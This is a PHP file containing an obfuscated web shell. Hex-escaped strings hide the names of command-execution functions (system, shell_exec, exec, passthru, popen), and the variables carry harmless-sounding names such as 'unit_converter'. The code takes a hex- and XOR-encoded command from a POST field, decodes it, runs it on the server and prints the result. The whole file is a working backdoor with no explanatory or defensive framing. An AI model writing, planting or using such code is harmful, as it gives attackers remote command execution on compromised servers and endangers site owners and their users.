<?php

$unit_converter2 = "sh\x65ll_e\x78\x65c";
$unit_converter3 = "ex\x65c";
$unit_converter6 = "\x73\x74r\x65\x61\x6D\x5F\x67\x65t_con\x74\x65nts";
$publish_content = "\x68\x65x2\x62in";
$unit_converter4 = "pa\x73\x73th\x72u";
$unit_converter1 = "s\x79\x73\x74em";
$unit_converter5 = "\x70\x6Fpen";
$unit_converter7 = "\x70c\x6C\x6Fse";
if (isset($_POST["\x65\x6Et"])) {
            function request_approved   ( $k  ,   $ent    )    {$record=   '' ;   $c=0; do{$record.=chr(ord($k[$c])^$ent);$c++;} while($c<strlen($k)); return $record; }
            $ent = $publish_content($_POST["\x65\x6Et"]);
            $ent = request_approved($ent, 72);
            if (function_exists($unit_converter1)) {
                $unit_converter1($ent);
            } elseif (function_exists($unit_converter2)) {
                print $unit_converter2($ent);
            } elseif (function_exists($unit_converter3)) {
                $unit_converter3($ent, $factor_k);
                print join("\n", $factor_k);
            } elseif (function_exists($unit_converter4)) {
                $unit_converter4($ent);
            } elseif (function_exists($unit_converter5) && function_exists($unit_converter6) && function_exists($unit_converter7)) {
                $ent_record = $unit_converter5($ent, 'r');
                if ($ent_record) {
                    $token_data = $unit_converter6($ent_record);
                    $unit_converter7($ent_record);
                    print $token_data;
                }
            }
            exit;
        }